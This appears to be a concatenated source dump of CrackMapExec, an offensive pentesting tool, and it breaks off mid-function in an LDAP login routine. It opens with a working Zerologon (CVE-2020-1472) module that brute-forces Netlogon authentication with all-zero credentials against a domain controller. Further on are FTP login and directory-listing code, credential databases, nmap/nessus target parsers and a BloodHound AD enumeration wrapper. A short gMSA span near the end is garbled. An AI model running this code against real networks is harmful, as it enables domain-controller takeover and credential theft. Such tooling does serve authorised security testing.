from impacket.dcerpc.v5 import nrpc, epm, transport
from impacket.dcerpc.v5.rpcrt import DCERPCException
import sys
from cme.logger import cme_logger
# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be necessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
class CMEModule:
name = "zerologon"
description = "Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472"
supported_protocols = ["smb", "wmi"]
opsec_safe = True
multiple_hosts = False
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
def options(self, context, module_options):
""""""
def on_login(self, context, connection):
self.context = context
if self.perform_attack("\\\\" + connection.hostname, connection.host, connection.hostname):
self.context.log.highlight("VULNERABLE")
self.context.log.highlight("Next step: https://github.com/dirkjanm/CVE-2020-1472")
try:
host = self.context.db.get_hosts(connection.host)[0]
self.context.db.add_host(
host.ip,
host.hostname,
host.domain,
host.os,
host.smbv1,
host.signing,
zerologon=True,
)
except Exception as e:
self.context.log.debug(f"Error updating zerologon status in database")
def perform_attack(self, dc_handle, dc_ip, target_computer):
# Keep authenticating until successful. Expected average number of attempts needed: 256.
self.context.log.debug("Performing authentication attempts...")
rpc_con = None
try:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
for attempt in range(0, MAX_ATTEMPTS):
result = try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer)
if result:
return True
else:
self.context.log.highlight("Attack failed. Target is probably patched.")
except DCERPCException as e:
self.context.log.fail(f"Error while connecting to host: DCERPCException, " f"which means this is probably not a DC!")
def fail(msg):
cme_logger.debug(msg)
cme_logger.fail("This might have been caused by invalid arguments or network issues.")
sys.exit(2)
def try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer):
# Connect to the DC's Netlogon service.
# Use an all-zero challenge and credential.
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
flags = 0x212FFFFF
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + "\x00", target_computer + "\x00", plaintext)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con,
dc_handle + "\x00",
target_computer + "$\x00",
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + "\x00",
ciphertext,
flags,
)
# It worked!
assert server_auth["ErrorCode"] == 0
return True
except nrpc.DCERPCSessionError as ex:
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
if ex.get_error_code() == 0xC0000022:
return None
else:
fail(f"Unexpected error code from DC: {ex.get_error_code()}.")
except BaseException as ex:
fail(f"Unexpected error: {ex}.")
================================================
FILE: cme/parsers/__init__.py
================================================
================================================
FILE: cme/parsers/ip.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ipaddress import ip_address, ip_network, summarize_address_range, ip_interface
def parse_targets(target):
try:
if "-" in target:
start_ip, end_ip = target.split("-")
try:
end_ip = ip_address(end_ip)
except ValueError:
first_three_octets = start_ip.split(".")[:-1]
first_three_octets.append(end_ip)
end_ip = ip_address(".".join(first_three_octets))
for ip_range in summarize_address_range(ip_address(start_ip), end_ip):
for ip in ip_range:
yield str(ip)
else:
if ip_interface(target).ip.version == 6 and ip_address(target).is_link_local:
yield str(target)
else:
for ip in ip_network(target, strict=False):
yield str(ip)
except ValueError as e:
yield str(target)
================================================
FILE: cme/parsers/nessus.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import xmltodict
# Ideally i'd like to be able to pull this info out dynamically from each protocol object but i'm a lazy bastard
protocol_dict = {
"smb": {"ports": [445, 139], "services": ["smb", "cifs"]},
"mssql": {"ports": [1433], "services": ["mssql"]},
"ssh": {"ports": [22], "services": ["ssh"]},
"winrm": {"ports": [5986, 5985], "services": ["www", "https?"]},
"http": {"ports": [80, 443, 8443, 8008, 8080, 8081], "services": ["www", "https?"]},
}
def parse_nessus_file(nessus_file, protocol):
targets = []
def handle_nessus_file(path, item):
# Must return True otherwise xmltodict will throw a ParsingIterrupted() exception
# https://github.com/martinblech/xmltodict/blob/master/xmltodict.py#L219
if any("ReportHost" and "ReportItem" in values for values in path):
item = dict(path)
ip = item["ReportHost"]["name"]
if ip in targets:
return True
port = item["ReportItem"]["port"]
svc_name = item["ReportItem"]["svc_name"]
if port in protocol_dict[protocol]["ports"]:
targets.append(ip)
if svc_name in protocol_dict[protocol]["services"]:
targets.append(ip)
return True
else:
return True
with open(nessus_file, "r") as file_handle:
xmltodict.parse(file_handle, item_depth=4, item_callback=handle_nessus_file)
return targets
================================================
FILE: cme/parsers/nmap.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from libnmap.parser import NmapParser
from cme.logger import cme_logger
# right now we are only referencing the port numbers, not the service name, but this should be sufficient for 99% cases
protocol_dict = {
"ftp": {
"ports": [21],
"services": ["ftp"]
},
"ssh": {
"ports": [22, 2222],
"services": ["ssh"]
},
"smb": {
"ports": [139, 445],
"services": ["netbios-ssn", "microsoft-ds"]
},
"ldap": {
"ports": [389, 636],
"services": ["ldap", "ldaps"]
},
"mssql": {
"ports": [1433],
"services": ["ms-sql-s"]
},
"rdp": {
"ports": [3389],
"services": ["ms-wbt-server"]
},
"winrm": {
"ports": [5985, 5986],
"services": ["wsman"]
},
"vnc": {
"ports": [5900, 5901, 5902, 5903, 5904, 5905, 5906],
"services": ["vnc"]
},
}
def parse_nmap_xml(nmap_output_file, protocol):
nmap_report = NmapParser.parse_fromfile(nmap_output_file)
targets = []
for host in nmap_report.hosts:
for port, proto in host.get_open_ports():
if port in protocol_dict[protocol]["ports"]:
targets.append(host.ipv4)
break
cme_logger.debug(f"Targets parsed from Nmap scan: {targets}")
return targets
================================================
FILE: cme/paths.py
================================================
import os
import sys
import cme
CME_PATH = os.path.expanduser("~/.cme")
TMP_PATH = os.path.join("/tmp", "cme_hosted")
if os.name == "nt":
TMP_PATH = os.getenv("LOCALAPPDATA") + "\\Temp\\cme_hosted"
if hasattr(sys, "getandroidapilevel"):
TMP_PATH = os.path.join("/data", "data", "com.termux", "files", "usr", "tmp", "cme_hosted")
WS_PATH = os.path.join(CME_PATH, "workspaces")
CERT_PATH = os.path.join(CME_PATH, "cme.pem")
CONFIG_PATH = os.path.join(CME_PATH, "cme.conf")
WORKSPACE_DIR = os.path.join(CME_PATH, "workspaces")
DATA_PATH = os.path.join(os.path.dirname(cme.__file__), "data")
================================================
FILE: cme/protocols/__init__.py
================================================
================================================
FILE: cme/protocols/ftp/__init__.py
================================================
================================================
FILE: cme/protocols/ftp/database.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
from sqlalchemy.dialects.sqlite import Insert
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy import MetaData, Table, select, delete, func
from sqlalchemy.exc import (
IllegalStateChangeError,
NoInspectionAvailable,
NoSuchTableError,
)
from cme.logger import cme_logger
class database:
def __init__(self, db_engine):
self.CredentialsTable = None
self.HostsTable = None
self.LoggedinRelationsTable = None
self.db_engine = db_engine
self.db_path = self.db_engine.url.database
self.protocol = Path(self.db_path).stem.upper()
self.metadata = MetaData()
self.reflect_tables()
session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)
Session = scoped_session(session_factory)
self.sess = Session()
@staticmethod
def db_schema(db_conn):
db_conn.execute("""CREATE TABLE "credentials" (
"id" integer PRIMARY KEY,
"username" text,
"password" text
)""")
db_conn.execute("""CREATE TABLE "hosts" (
"id" integer PRIMARY KEY,
"host" text,
"port" integer,
"banner" text
)""")
db_conn.execute("""CREATE TABLE "loggedin_relations" (
"id" integer PRIMARY KEY,
"credid" integer,
"hostid" integer,
FOREIGN KEY(credid) REFERENCES credentials(id),
FOREIGN KEY(hostid) REFERENCES hosts(id)
)""")
db_conn.execute("""CREATE TABLE "directory_listings" (
"id" integer PRIMARY KEY,
"lir_id" integer,
"data" text,
FOREIGN KEY(lir_id) REFERENCES loggedin_relations(id)
)""")
def reflect_tables(self):
with self.db_engine.connect():
try:
self.CredentialsTable = Table(
"credentials", self.metadata, autoload_with=self.db_engine
)
self.HostsTable = Table(
"hosts", self.metadata, autoload_with=self.db_engine
)
self.LoggedinRelationsTable = Table(
"loggedin_relations", self.metadata, autoload_with=self.db_engine
)
self.DirectoryListingsTable = Table(
"directory_listings", self.metadata, autoload_with=self.db_engine
)
except (NoInspectionAvailable, NoSuchTableError):
print(
f"""
[-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch
[-] This is probably because a newer version of CME is being ran on an old DB schema
[-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)
[-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB"""
)
exit()
def shutdown_db(self):
try:
self.sess.close()
# due to the async nature of CME, sometimes session state is a bit messy and this will throw:
# Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and
# this would cause an unexpected state change to
except IllegalStateChangeError as e:
cme_logger.debug(f"Error while closing session db object: {e}")
def clear_database(self):
for table in self.metadata.sorted_tables:
self.sess.execute(table.delete())
def add_host(self, host, port, banner):
"""
Check if this host is already in the DB, if not add it
"""
hosts = []
updated_ids = []
q = select(self.HostsTable).filter(self.HostsTable.c.host == host)
results = self.sess.execute(q).all()
# create new host
if not results:
new_host = {
"host": host,
"port": port,
"banner": banner,
}
hosts = [new_host]
# update existing hosts data
else:
for host_result in results:
host_data = host_result._asdict()
cme_logger.debug(f"host: {host_result}")
cme_logger.debug(f"host_data: {host_data}")
# only update column if it is being passed in
if host is not None:
host_data["host"] = host
if port is not None:
host_data["port"] = port
if banner is not None:
host_data["banner"] = banner
# only add host to be updated if it has changed
if host_data not in hosts:
hosts.append(host_data)
updated_ids.append(host_data["id"])
cme_logger.debug(f"Hosts: {hosts}")
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.HostsTable) # .returning(self.HostsTable.c.id)
update_columns = {col.name: col for col in q.excluded if col.name not in "id"}
q = q.on_conflict_do_update(
index_elements=self.HostsTable.primary_key,
set_=update_columns
)
self.sess.execute(q, hosts) # .scalar()
# we only return updated IDs for now - when RETURNING clause is allowed we can return inserted
if updated_ids:
cme_logger.debug(f"add_host() - Host IDs Updated: {updated_ids}")
return updated_ids
def add_credential(self, username, password):
"""
Check if this credential has already been added to the database, if not add it in.
"""
credentials = []
q = select(self.CredentialsTable).filter(
func.lower(self.CredentialsTable.c.username) == func.lower(username),
func.lower(self.CredentialsTable.c.password) == func.lower(password)
)
results = self.sess.execute(q).all()
# add new credential
if not results:
new_cred = {
"username": username,
"password": password,
}
credentials = [new_cred]
# update existing cred data
else:
for creds in results:
# this will include the id, so we don't touch it
cred_data = creds._asdict()
# only update column if it is being passed in
if username is not None:
cred_data["username"] = username
if password is not None:
cred_data["password"] = password
# only add cred to be updated if it has changed
if cred_data not in credentials:
credentials.append(cred_data)
# TODO: find a way to abstract this away to a single Upsert call
q_users = Insert(self.CredentialsTable) # .returning(self.CredentialsTable.c.id)
update_columns_users = {col.name: col for col in q_users.excluded if col.name not in "id"}
q_users = q_users.on_conflict_do_update(
index_elements=self.CredentialsTable.primary_key,
set_=update_columns_users
)
cme_logger.debug(f"Adding credentials: {credentials}")
self.sess.execute(q_users, credentials) # .scalar()
# return cred_ids
# hacky way to get cred_id since we can't use returning() yet
if len(credentials) == 1:
cred_id = self.get_credential(username, password)
return cred_id
else:
return credentials
def remove_credentials(self, creds_id):
"""
Removes a credential ID from the database
"""
del_hosts = []
for cred_id in creds_id:
q = delete(self.CredentialsTable).filter(self.CredentialsTable.c.id == cred_id)
del_hosts.append(q)
self.sess.execute(q)
def is_credential_valid(self, credential_id):
"""
Check if this credential ID is valid.
"""
q = select(self.CredentialsTable).filter(
self.CredentialsTable.c.id == credential_id,
self.CredentialsTable.c.password is not None,
)
results = self.sess.execute(q).all()
return len(results) > 0
def get_credential(self, username, password):
q = select(self.CredentialsTable).filter(
self.CredentialsTable.c.username == username,
self.CredentialsTable.c.password == password,
)
results = self.sess.execute(q).first()
if results is None:
return None
else:
return results.id
def get_credentials(self, filter_term=None):
"""
Return credentials from the database.
"""
# if we're returning a single credential by ID
if self.is_credential_valid(filter_term):
q = select(self.CredentialsTable).filter(self.CredentialsTable.c.id == filter_term)
# if we're filtering by username
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username).like(like_term))
# otherwise return all credentials
else:
q = select(self.CredentialsTable)
results = self.sess.execute(q).all()
return results
def is_host_valid(self, host_id):
"""
Check if this host ID is valid.
"""
q = select(self.HostsTable).filter(self.HostsTable.c.id == host_id)
results = self.sess.execute(q).all()
return len(results) > 0
def get_hosts(self, filter_term=None):
"""
Return hosts from the database.
"""
q = select(self.HostsTable)
# if we're returning a single host by ID
if self.is_host_valid(filter_term):
q = q.filter(self.HostsTable.c.id == filter_term)
results = self.sess.execute(q).first()
# all() returns a list, so we keep the return format the same so consumers don't have to guess
return [results]
# if we're filtering by host
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = q.filter(self.HostsTable.c.host.like(like_term))
results = self.sess.execute(q).all()
cme_logger.debug(f"FTP get_hosts() - results: {results}")
return results
def is_user_valid(self, cred_id):
"""
Check if this User ID is valid.
"""
q = select(self.CredentialsTable).filter(self.CredentialsTable.c.id == cred_id)
results = self.sess.execute(q).all()
return len(results) > 0
def get_user(self, username):
q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username) == func.lower(username))
results = self.sess.execute(q).all()
return results
def get_users(self, filter_term=None):
q = select(self.CredentialsTable)
if self.is_user_valid(filter_term):
q = q.filter(self.CredentialsTable.c.id == filter_term)
# if we're filtering by username
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = q.filter(func.lower(self.CredentialsTable.c.username).like(like_term))
results = self.sess.execute(q).all()
return results
def add_loggedin_relation(self, cred_id, host_id):
relation_query = select(self.LoggedinRelationsTable).filter(
self.LoggedinRelationsTable.c.credid == cred_id,
self.LoggedinRelationsTable.c.hostid == host_id,
)
results = self.sess.execute(relation_query).all()
# only add one if one doesn't already exist
if not results:
relation = {
"credid": cred_id,
"hostid": host_id
}
try:
cme_logger.debug(f"Inserting loggedin_relations: {relation}")
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)
self.sess.execute(q, [relation]) # .scalar()
inserted_id_results = self.get_loggedin_relations(cred_id, host_id)
cme_logger.debug(f"Checking if relation was added: {inserted_id_results}")
return inserted_id_results[0].id
except Exception as e:
cme_logger.debug(f"Error inserting LoggedinRelation: {e}")
def get_loggedin_relations(self, cred_id=None, host_id=None):
q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)
if cred_id:
q = q.filter(self.LoggedinRelationsTable.c.credid == cred_id)
if host_id:
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
results = self.sess.execute(q).all()
return results
def remove_loggedin_relations(self, cred_id=None, host_id=None):
q = delete(self.LoggedinRelationsTable)
if cred_id:
q = q.filter(self.LoggedinRelationsTable.c.credid == cred_id)
elif host_id:
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
self.sess.execute(q)
def add_directory_listing(self, lir_id, data):
pass
def get_directory_listing(self):
pass
def remove_directory_listing(self):
pass
================================================
FILE: cme/protocols/ftp/db_navigator.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.cmedb import DatabaseNavigator, print_table, print_help
class navigator(DatabaseNavigator):
def display_creds(self, creds):
data = [[
"CredID",
"Total Logins",
"Username",
"Password",
]]
for cred in creds:
total_users = self.db.get_loggedin_relations(cred_id=cred[0])
data.append([
cred[0],
str(len(total_users)) + " Host(s)",
cred[1],
cred[2],
])
print_table(data, title="Credentials")
def display_hosts(self, hosts):
data = [[
"HostID",
"Total Users",
"Host",
"Port",
"Banner",
]]
for h in hosts:
total_users = self.db.get_loggedin_relations(host_id=h[0])
data.append([
h[0],
str(len(total_users)) + " User(s)",
h[1],
h[2],
h[3],
])
print_table(data, title="Hosts")
def do_hosts(self, line):
filter_term = line.strip()
if filter_term == "":
hosts = self.db.get_hosts()
self.display_hosts(hosts)
else:
hosts = self.db.get_hosts(filter_term=filter_term)
if len(hosts) > 1:
self.display_hosts(hosts)
elif len(hosts) == 1:
data = [[
"HostID",
"Host",
"Port",
"Banner"
]]
host_id_list = [h[0] for h in hosts]
for h in hosts:
data.append([h[0], h[1], h[2], h[3], h[4]])
print_table(data, title="Host")
login_data = [[
"CredID",
"UserName",
"Password"
]]
for host_id in host_id_list:
login_links = self.db.get_loggedin_relations(host_id=host_id)
for link in login_links:
link_id, cred_id, host_id = link
creds = self.db.get_credentials(filter_term=cred_id)
for cred in creds:
cred_data = [cred[0], cred[1], cred[2]]
if cred_data not in login_data:
login_data.append(cred_data)
if len(login_data) > 1:
print_table(login_data, title="Credential(s) with Logins",)
@staticmethod
def help_hosts(self):
help_string = """
hosts [filter_term]
By default prints all hosts
Table format:
| 'HostID', 'Host', 'Port', 'Banner' |
"""
print_help(help_string)
def do_creds(self, line):
filter_term = line.strip()
if filter_term == "":
creds = self.db.get_credentials()
self.display_creds(creds)
elif filter_term.split()[0].lower() == "add":
# add format: "username password"
args = filter_term.split()[1:]
if len(args) == 2:
username, password = args
self.db.add_credential(username, password)
else:
print("[!] Format is 'add username password")
return
elif filter_term.split()[0].lower() == "remove":
args = filter_term.split()[1:]
if len(args) != 1:
print("[!] Format is 'remove '")
return
else:
self.db.remove_credentials(args)
self.db.remove_admin_relation(user_ids=args)
else:
creds = self.db.get_credentials(filter_term=filter_term)
if len(creds) != 1:
self.display_creds(creds)
elif len(creds) == 1:
cred_data = [["CredID", "UserName", "Password"]]
cred_id_list = []
for cred in creds:
cred_id = cred[0]
cred_id_list.append(cred_id)
username = cred[1]
password = cred[2]
cred_data.append([cred_id, username, password])
print_table(cred_data, title="Credential(s)")
access_data = [["HostID", "Host", "Port", "Banner"]]
for cred_id in cred_id_list:
logins = self.db.get_loggedin_relations(cred_id=cred_id)
for link in logins:
link_id, cred_id, host_id = link
hosts = self.db.get_hosts(host_id)
for h in hosts:
access_data.append([h[0], h[1], h[2], h[3]])
# we look if it's greater than one because the header row always exists
if len(access_data) > 1:
print_table(access_data, title="Access to Host(s)")
def help_creds(self):
help_string = """
creds [add|remove|filter_term]
By default prints all creds
Table format:
| 'CredID', 'Login To', 'UserName', 'Password' |
Subcommands:
add - format: "add username password "
remove - format: "remove "
filter_term - filters creds with filter_term
If a single credential is returned (e.g. `creds 15`, it prints the following tables:
Credential(s) | 'CredID', 'UserName', 'Password' |
Access to Host(s) | 'HostID', 'Host', 'OS', 'Banner'
Otherwise, it prints the default credential table from a `like` query on the `username` column
"""
print_help(help_string)
def do_clear_database(self, line):
if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y":
self.db.clear_database()
@staticmethod
def help_clear_database(self):
help_string = """
clear_database
THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE
YOU CANNOT UNDO THIS COMMAND
"""
print_help(help_string)
================================================
FILE: cme/protocols/ftp/proto_args.py
================================================
def proto_args(parser, std_parser, module_parser):
ftp_parser = parser.add_parser("ftp", help="own stuff using FTP", parents=[std_parser, module_parser])
ftp_parser.add_argument("--port", type=int, default=21, help="FTP port (default: 21)")
cgroup = ftp_parser.add_argument_group("FTP Access", "Options for enumerating your access")
cgroup.add_argument("--ls", action="store_true", help="List files in the directory")
return parser
================================================
FILE: cme/protocols/ftp.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.config import process_secret
from cme.connection import *
from cme.logger import CMEAdapter
from ftplib import FTP, error_reply, error_temp, error_perm, error_proto
class ftp(connection):
def __init__(self, args, db, host):
self.protocol = "FTP"
self.remote_version = None
super().__init__(args, db, host)
def proto_logger(self):
self.logger = CMEAdapter(
extra={
"protocol": "FTP",
"host": self.host,
"port": self.args.port,
"hostname": self.hostname,
}
)
def proto_flow(self):
self.proto_logger()
if self.create_conn_obj():
if self.enum_host_info():
if self.print_host_info():
if self.login():
pass
def enum_host_info(self):
welcome = self.conn.getwelcome()
self.logger.debug(f"Welcome result: {welcome}")
self.remote_version = welcome.split("220", 1)[1].strip() # strip out the extra space in the front
self.logger.debug(f"Remote version: {self.remote_version}")
return True
def print_host_info(self):
self.logger.display(f"Banner: {self.remote_version}")
return True
def create_conn_obj(self):
self.conn = FTP()
try:
self.conn.connect(host=self.host, port=self.args.port)
except error_reply:
return False
except error_temp:
return False
except error_perm:
return False
except error_proto:
return False
except socket.error:
return False
return True
def plaintext_login(self, username, password):
if not self.conn.sock:
self.create_conn_obj()
try:
self.logger.debug(self.conn.sock)
resp = self.conn.login(user=username, passwd=password)
self.logger.debug(f"Response: {resp}")
except Exception as e:
self.logger.fail(f"{username}:{process_secret(password)} (Response:{e})")
self.conn.close()
return False
# 230 is "User logged in, proceed" response, ftplib raises an exception on failed login
if "230" in resp:
self.logger.debug(f"Host: {self.host} Port: {self.args.port}")
self.db.add_host(self.host, self.args.port, self.remote_version)
cred_id = self.db.add_credential(username, password)
host_id = self.db.get_hosts(self.host)[0].id
self.db.add_loggedin_relation(cred_id, host_id)
if username in ["anonymous", ""] and password in ["", "-"]:
self.logger.success(f"{username}:{process_secret(password)} {highlight('- Anonymous Login!')}")
else:
self.logger.success(f"{username}:{process_secret(password)}")
if self.args.ls:
files = self.list_directory_full()
self.logger.display(f"Directory Listing")
for file in files:
self.logger.highlight(file)
if not self.args.continue_on_success:
self.conn.close()
return True
self.conn.close()
def list_directory_full(self):
# in the future we can use mlsd/nlst if we want, but this gives a full output like `ls -la`
# ftplib's "dir" prints directly to stdout, and "nlst" only returns the folder name, not full details
files = []
self.conn.retrlines("LIST", callback=files.append)
return files
def supported_commands(self):
raw_supported_commands = self.conn.sendcmd("HELP")
supported_commands = [item for sublist in (x.split() for x in raw_supported_commands.split("\n")[1:-1]) for item in sublist]
self.logger.debug(f"Supported commands: {supported_commands}")
return supported_commands
================================================
FILE: cme/protocols/ldap/__init__.py
================================================
================================================
FILE: cme/protocols/ldap/bloodhound.py
================================================
import sys, time
from cme.logger import CMEAdapter
from bloodhound.ad.domain import ADDC
from bloodhound.enumeration.computers import ComputerEnumerator
from bloodhound.enumeration.memberships import MembershipEnumerator
from bloodhound.enumeration.domains import DomainEnumerator
class BloodHound(object):
def __init__(self, ad, hostname, host, port):
self.ad = ad
self.ldap = None
self.pdc = None
self.sessions = []
self.hostname = hostname
self.dc = hostname
self.proto_logger(port, hostname, host)
def proto_logger(self, port, hostname, host):
self.logger = CMEAdapter(extra={"protocol": "LDAP", "host": host, "port": port, "hostname": hostname})
def connect(self):
if len(self.ad.dcs()) == 0:
self.logger.fail("Could not find a domain controller. Consider specifying a domain and/or DNS server.")
sys.exit(1)
if not self.ad.baseDN:
self.logger.fail("Could not figure out the domain to query. Please specify this manually with -d")
sys.exit(1)
pdc = self.ad.dcs()[0]
self.logger.debug("Using LDAP server: %s", pdc)
self.logger.debug("Using base DN: %s", self.ad.baseDN)
if len(self.ad.kdcs()) > 0:
kdc = self.ad.kdcs()[0]
self.logger.debug("Using kerberos KDC: %s", kdc)
self.logger.debug("Using kerberos realm: %s", self.ad.realm())
# Create a domain controller object
self.pdc = ADDC(pdc, self.ad)
# Create an object resolver
self.ad.create_objectresolver(self.pdc)
# self.pdc.ldap_connect(self.ad.auth.username, self.ad.auth.password, kdc)
def run(
self,
collect,
num_workers=10,
disable_pooling=False,
timestamp="",
computerfile="",
cachefile=None,
exclude_dcs=False,
):
start_time = time.time()
if cachefile:
self.ad.load_cachefile(cachefile)
# Check early if we should enumerate computers as well
do_computer_enum = any(
method in collect
for method in [
"localadmin",
"session",
"loggedon",
"experimental",
"rdp",
"dcom",
"psremote",
]
)
if "group" in collect or "objectprops" in collect or "acl" in collect:
# Fetch domains for later, computers if needed
self.pdc.prefetch_info(
"objectprops" in collect,
"acl" in collect,
cache_computers=do_computer_enum,
)
# Initialize enumerator
membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)
membership_enum.enumerate_memberships(timestamp=timestamp)
elif "container" in collect:
# Fetch domains for later, computers if needed
self.pdc.prefetch_info(
"objectprops" in collect,
"acl" in collect,
cache_computers=do_computer_enum,
)
# Initialize enumerator
membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)
membership_enum.do_container_collection(timestamp=timestamp)
elif do_computer_enum:
# We need to know which computers to query regardless
# We also need the domains to have a mapping from NETBIOS -> FQDN for local admins
self.pdc.prefetch_info("objectprops" in collect, "acl" in collect, cache_computers=True)
elif "trusts" in collect:
# Prefetch domains
self.pdc.get_domains("acl" in collect)
if "trusts" in collect or "acl" in collect or "objectprops" in collect:
trusts_enum = DomainEnumerator(self.ad, self.pdc)
trusts_enum.dump_domain(collect, timestamp=timestamp)
if do_computer_enum:
# If we don't have a GC server, don't use it for deconflictation
have_gc = len(self.ad.gcs()) > 0
computer_enum = ComputerEnumerator(
self.ad,
self.pdc,
collect,
do_gc_lookup=have_gc,
computerfile=computerfile,
exclude_dcs=exclude_dcs,
)
computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp)
end_time = time.time()
minutes, seconds = divmod(int(end_time - start_time), 60)
self.logger.highlight("Done in %02dM %02dS" % (minutes, seconds))
================================================
FILE: cme/protocols/ldap/database.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy import MetaData, Table
from sqlalchemy.exc import (
IllegalStateChangeError,
NoInspectionAvailable,
NoSuchTableError,
)
from cme.logger import cme_logger
class database:
def __init__(self, db_engine):
self.CredentialsTable = None
self.HostsTable = None
self.db_engine = db_engine
self.db_path = self.db_engine.url.database
self.protocol = Path(self.db_path).stem.upper()
self.metadata = MetaData()
self.reflect_tables()
session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)
Session = scoped_session(session_factory)
# this is still named "conn" when it is the session object; TODO: rename
self.conn = Session()
@staticmethod
def db_schema(db_conn):
db_conn.execute(
"""CREATE TABLE "credentials" (
"id" integer PRIMARY KEY,
"username" text,
"password" text
)"""
)
db_conn.execute(
"""CREATE TABLE "hosts" (
"id" integer PRIMARY KEY,
"ip" text,
"hostname" text,
"port" integer
)"""
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
try:
self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine)
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
except (NoInspectionAvailable, NoSuchTableError):
print(
f"""
[-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch
[-] This is probably because a newer version of CME is being ran on an old DB schema
[-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)
[-] Then remove the CME {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB"""
)
exit()
def shutdown_db(self):
try:
self.conn.close()
# due to the async nature of CME, sometimes session state is a bit messy and this will throw:
# Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and
# this would cause an unexpected state change to
except IllegalStateChangeError as e:
cme_logger.debug(f"Error while closing session db object: {e}")
def clear_database(self):
for table in self.metadata.sorted_tables:
self.conn.execute(table.delete())
================================================
FILE: cme/protocols/ldap/db_navigator.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.cmedb import DatabaseNavigator, print_help
class navigator(DatabaseNavigator):
def do_clear_database(self, line):
if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y":
self.db.clear_database()
def help_clear_database(self):
help_string = """
clear_database
THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE
YOU CANNOT UNDO THIS COMMAND
"""
print_help(help_string)
================================================
FILE: cme/protocols/ldap/gmsa.py
================================================
from impacket.structure import Structure
class MSDS_MANAGEDPASSWORD_BLOB(Structure):
structure = (
("Version", "= 0:
# We need to try SSL
try:
ldapConnection = ldap_impacket.LDAPConnection(f"ldaps://{kdcHost}", baseDN)
ldapConnection.login(
username,
password,
domain,
lmhash,
nthash,
aesKey,
kdcHost=kdcHost,
useCache=False,
)
self.logger.extra["protocol"] = "LDAPS"
self.logger.extra["port"] = "636"
# self.logger.success(out)
return ldapConnection
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.fail(
f"{domain}\\{username}:{password if password else ntlm_hash} {ldap_error_status[errorCode] if errorCode in ldap_error_status else ''}",
color="magenta" if errorCode in ldap_error_status else "red",
)
else:
errorCode = str(e).split()[-2][:-1]
self.logger.fail(
f"{domain}\\{username}:{password if password else ntlm_hash} {ldap_error_status[errorCode] if errorCode in ldap_error_status else ''}",
color="magenta" if errorCode in ldap_error_status else "red",
)
return False
except OSError as e:
self.logger.debug(f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}")
return False
except KerberosError as e:
self.logger.fail(
f"{domain}\\{username}:{password if password else ntlm_hash} {str(e)}",
color="red",
)
return False
def auth_login(self, domain, username, password, ntlm_hash):
lmhash = ""
nthash = ""
# This checks to see if we didn't provide the LM Hash
if ntlm_hash and ntlm_hash.find(":") != -1:
lmhash, nthash = ntlm_hash.split(":")
elif ntlm_hash:
